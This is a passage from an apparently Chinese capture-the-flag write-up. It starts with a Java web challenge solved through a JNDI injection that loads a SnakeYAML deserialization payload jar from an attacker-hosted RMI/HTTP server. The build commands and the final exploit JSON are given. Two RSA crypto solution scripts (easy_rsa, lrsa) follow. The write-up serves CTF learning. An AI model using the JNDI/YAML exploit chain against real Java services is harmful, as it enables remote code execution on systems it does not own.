image-20220904115911678不过不知为何貌似不解析dtd,没能实现外带数据,在这里卡了很久,之后才发现存在snakeyaml这个库。
修改一下Welk1n师傅的jndi-bypass注入工具,添加上snakeyaml:
image-20220904120354441yaml反序列化:https://github.com/artsploit/yaml-payload/
改一下执行的命令之后生成jar包:
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
起个http服务器把生成的jar包丢到目录之后就可以进行利用了。
最后exp:
{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"rmi://xxx:port/tomcat_snakeyaml"}, "msg":{"$ref":"$.content.context"}}
easy_rsa
#!/usr/bin/env python
# coding: utf-8
# In[19]:
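# Jupyter export. NOTE(review): gcd, is_prime, inverse_mod and power_mod are
# not Python builtins — the notebook presumably ran under SageMath, which
# provides them; confirm before running elsewhere.

# Read the moduli (one per line) and close the file afterwards.
with open("output.txt", "r") as f:
    a = f.readlines()

# The original filled ns[11 - i], i.e. the lines in reverse order, which only
# works for exactly 12 lines; reversed() gives the same order for any count.
ns = [int(line) for line in reversed(a)]

# The first two moduli share a prime factor.
p = gcd(ns[0], ns[1])
tm = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
e = 65537
# Peel the layers: every modulus is expected to be p * q with q prime (the
# assert checks it), so each private exponent follows from (p - 1) * (q - 1).
for n in ns:
    q = n // p
    assert is_prime(q)
    d = inverse_mod(e, (p - 1) * (q - 1))
    tm = power_mod(tm, d, n)
print(tm)

import libnum

libnum.n2s(int(tm))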
lrsa
'''
t=(pP-58P+q)%Q
t=(pP-58P+q)+kQ
kQ=t-(p-58)*P+q
kQ/P = (p-58) + (t+q)/P
Q/P = (p-58)/k + (t+q)/(kP)
Q/P - (p-58)/k = (t+q)/(kP) < 1/2k^2
'''
from Crypto.Util.number import *
from gmpy2 import gcd
from sympy import isprime
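t=44
e=65537
c=4364802217291010807437827526073499188746160856656033054696031258814848127341094853323797303333741617649819892633013549917144139975939225893749114460910089509552261297408649636515368831194227006310835137628421405558641056278574098849091436284763725120659865442243245486345692476515256604820175726649516152356765363753262839864657243662645981385763738120585801720865252694204286145009527172990713740098977714337038793323846801300955225503801654258983911473974238212956519721447805792992654110642511482243273775873164502478594971816554268730722314333969932527553109979814408613177186842539860073028659812891580301154746
PPQ = 17550772391048142376662352375650397168226219900284185133945819378595084615279414529115194246625188015626268312188291451580718399491413731583962229337205180301248556893326419027312533686033888462669675100382278716791450615542537581657011200868911872550652311318486382920999726120813916439522474691195194557657267042628374572411645371485995174777885120394234154274071083542059010253657420242098856699109476857347677270860654429688935924519805555787949683144015873225388396740487817155358042797286990338440987035608851331840925854381286767024584195081004360635842976624747610461507795755042915965483135990495921912997789567020652729777216671481467049291624343256152446367091568361258918212012737611001009003078023715854575413979603297947011959023398306612437250872299406744778763429172689675430968886613391356192380152315042387148665654062576525633130546454743040442444227245763939134967515614637300940642555367668537324892890004459521919887178391559206373513466653484926149453481758790663522317898916616435463486824881406198956479504970446076256447830689197409184703931842169195650953917594642601134810084247402051464584676932882503143409428970896718980446185114397748313655630266379123438583315809104543663538494519415242569480492899140190587129956835218417371308642212037424611690324353109931657289337536406499314388951678319136343913551598851601805737870217800009086551022197432448461112330252097447894028786035069710260561955740514091976513928307284531381150606428802334767412638213776730300093872457594524254858721551285338651364457529927871215183857169772407595348187949014442596356406144157105062291018215254440382214000573515515859668018846789551567310531570458316720877172632139481792680258388798439064221051325274383331521717987420093245521230610073103811158660291643007279940393509663374960353315388446956868294358252276964954745551655711981
PQQ = 17632503734712698604217167790453868045296303200715867263641257955056721075502316035280716025016839471684329988600978978424661087892466132185482035374940487837109552684763339574491378951189521258328752145077889261805000262141719400516584216130899437363088936913664419705248701787497332582188063869114908628807937049986360525010012039863210179017248132893824655341728382780250878156526086594253092249935304259986328308203344932540888448163430113818706295806406535364433801544858874357459282988110371175948011077595778123265914357153104206808258347815853145593128831233094769191889153762451880396333921190835200889266000562699392602082643298040136498839726733129090381507278582253125509943696419087708429546384313035073010683709744463087794325058122495375333875728593383803489271258323466068830034394348582326189840226236821974979834541554188673335151333713605570214286605391522582123096490317734786072061052604324131559447145448500381240146742679889154145555389449773359530020107821711994953950072547113428811855524572017820861579995449831880269151834230607863568992929328355995768974532894288752369127771516710199600449849031992434777962666440682129817924824151147427747882725858977273856311911431085373396551436319200582072164015150896425482384248479071434032953021738952688256364397405939276917210952583838731888536160866721278250628482428975748118973182256529453045184370543766401320261730361611365906347736001225775255350554164449014831203472238042057456969218316231699556466298168668958678855382462970622819417830000343573014265235688391542452769592096406400900187933156352226983897249981036555748543606676736274049188713348408983072484516372145496924391146241282884948724825393087105077360952770212959517318021248639012476095670769959011548699960423508352158455979906789927951812368185987838359200354730654103428077770839008773864604836807261909
# The two values are named as if PPQ = P*P*Q and PQQ = P*Q*Q; their gcd is
# then P*Q, and dividing it out separates P and Q.
PQ = GCD(PPQ,PQQ)
Q = PQQ // PQ
P = PPQ // PQ
# From the derivation in the docstring above, (p - 58) / k is a convergent
# of Q / P. NOTE(review): continued_fraction(), .convergents(), .numerator()
# and .denominator() are SageMath API, and Q/P has to be an exact rational
# for this to work — under plain Python the division would yield a float.
for each in continued_fraction(Q/P).convergents():
    p_58 = each.numerator()
    k = each.denominator()
    p = int(p_58+58)
    if p.bit_length() == 1023 and isPrime(int(p)):
        # t = (p*P - 58*P + q) % Q  =>  q = (t - p*P + 58*P) % Q
        # (the original wrote `t-pP+58P`, which is not valid Python:
        # `pP` is an undefined name and `58P` is a syntax error).
        q = (t - p*P + 58*P) % Q
        phi = (p-1)*(q-1)
        d = inverse(e,phi)
        m = pow(c,d,p*q)
        print(long_to_bytes(m))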